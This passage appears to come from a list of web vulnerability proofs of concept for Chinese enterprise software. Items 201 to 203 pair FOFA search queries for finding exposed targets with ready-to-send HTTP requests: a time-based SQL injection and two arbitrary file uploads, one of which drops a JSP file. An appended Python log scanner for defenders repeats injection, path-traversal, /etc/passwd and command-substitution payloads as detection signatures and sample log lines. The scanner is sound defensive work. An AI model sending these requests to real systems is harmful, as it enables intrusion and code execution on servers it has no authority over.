201. 方正全媒体新闻采编系统 binary SQL injection
FOFA: body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA: body="/Widgets/WidgetCollection/"
Fetch the current __VIEWSTATE and __EVENTVALIDATION values from the page:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Substitute those __VIEWSTATE and __EVENTVALIDATION values into the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

Uploaded file path: /_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA: body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

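For defenders checking this list against their own web-server logs, the following is an added example, not part of the original article: it scans combined-format access logs for the request paths and payload patterns that appear in items 186 to 203 above. The sample log lines are constructed for the example. Access logs do not contain POST bodies, so for the body-based injections (items 186, 187, 191, 201) only the endpoint hit itself is visible here; seeing the payload needs full-request capture at a WAF or reverse proxy.

```python
import re
import sys
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Request paths lifted from the PoCs in items 186-203 (item -> regex over the decoded request target).
ENDPOINT_SIGNATURES: Dict[str, re.Pattern] = {
    "186 DataCube3 getting_index_data.php": re.compile(r"/admin/pr_monitor/getting_index_data\.php"),
    "187 Mura CMS processAsyncObject": re.compile(r"/index\.cfm/_api/json/v1/default/\?method=processAsyncObject"),
    "188 attachment file read": re.compile(r"/attachment\?file="),
    "189 LANWON deleteStudy.php": re.compile(r"/xds/deleteStudy\.php"),
    "190 Userinfo/poihuoqu": re.compile(r"/admin/Userinfo/poihuoqu"),
    "191 CDGServer3 NavigationAjax": re.compile(r"/CDGServer3/.*NavigationAjax"),
    "192 UploadEmailAttr": re.compile(r"/JoinfApp/EMail/UploadEmailAttr"),
    "193 setSystemTimeAction.php": re.compile(r"/master/ajaxActions/setSystemTimeAction\.php"),
    "194 uploadAttachmentServlet": re.compile(r"/servlet/uploadAttachmentServlet"),
    "195 send_order.cgi": re.compile(r"/send_order\.cgi"),
    "196 resetPasswordBySuper": re.compile(r"/cas/userCtl/resetPasswordBySuper"),
    "197 Quotegask_editAction": re.compile(r"/entsoft/Quotegask_editAction\.entweb"),
    "198 aliyundrive-webdav query": re.compile(r"/cgi-bin/luci/admin/services/aliyundrive-webdav/query"),
    "199 Cockpit assetsmanager/upload": re.compile(r"/assetsmanager/upload"),
    "200 SeaCMS dmku": re.compile(r"/js/player/dmplayer/dmku/"),
    "201 newsplan binary.do": re.compile(r"/newsedit/newsplan/task/binary\.do"),
    "202 AccountEdit.aspx": re.compile(r"/User/AccountEdit\.aspx"),
    "203 PtFjk.mob upload": re.compile(r"/RedseaPlatform/PtFjk\.mob\?method=upload"),
}

# Payload patterns that recur across the PoCs, matched independently of product so that
# the same trick against an endpoint not on this list is still flagged.
PAYLOAD_SIGNATURES: Dict[str, re.Pattern] = {
    "time-based SQLi (MySQL sleep)": re.compile(r"\bsleep\s*\(", re.I),
    "time-based SQLi (MSSQL WAITFOR DELAY)": re.compile(r"waitfor\s+delay", re.I),
    "heavy-query SQLi (SQLite randomblob)": re.compile(r"randomblob\s*\(", re.I),
    "path traversal": re.compile(r"(^|[/\\])\.\.([/\\]|$)"),
    "local file scheme": re.compile(r"file:///", re.I),
    "/etc/passwd read": re.compile(r"/etc/passwd"),
    "backtick command substitution": re.compile(r"`[^`]+`"),
}

# Apache/Nginx combined log format: ip ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def classify_request(target: str) -> List[str]:
    """Return the signature names that match a request target (path plus query string)."""
    # Decode once so %20, %27, %60 and '+' cannot hide the payload from the patterns.
    decoded = unquote_plus(target)
    hits = [name for name, rx in ENDPOINT_SIGNATURES.items() if rx.search(decoded)]
    hits += [name for name, rx in PAYLOAD_SIGNATURES.items() if rx.search(decoded)]
    return hits


def scan_access_log(lines) -> List[Tuple[str, str, List[str]]]:
    """Yield (client_ip, target, matched_signatures) for every log line that trips a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["target"])
        if hits:
            findings.append((m["ip"], m["target"], hits))
    return findings


# Constructed sample lines for the example; the addresses are documentation ranges, not real clients.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2024:10:01:13 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2024:10:01:20 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 57 "-" "Mozilla/5.0"
198.51.100.3 - - [12/May/2024:10:02:02 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.3 - - [12/May/2024:10:02:30 +0800] "POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" 200 96 "-" "Mozilla/5.0"
192.0.2.10 - - [12/May/2024:10:03:00 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [12/May/2024:10:03:05 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60ls%20/%3E/www/aaa.txt%60%20 HTTP/1.1" 200 2 "-" "Mozilla/5.0"
"""


if __name__ == "__main__":
    # Scan a real log when a path is given, otherwise the constructed sample above.
    source = open(sys.argv[1], encoding="utf-8", errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    for ip, target, hits in scan_access_log(source):
        print(f"{ip}\t{target}\t{'; '.join(hits)}")
```

A 200 on one of the upload or command-execution endpoints deserves a look at what landed on disk (the PoCs above name the resulting paths, for example /storage/uploads/ and /_data/Uploads/); a hit on a time-based pattern is worth correlating with response time if the log format records it.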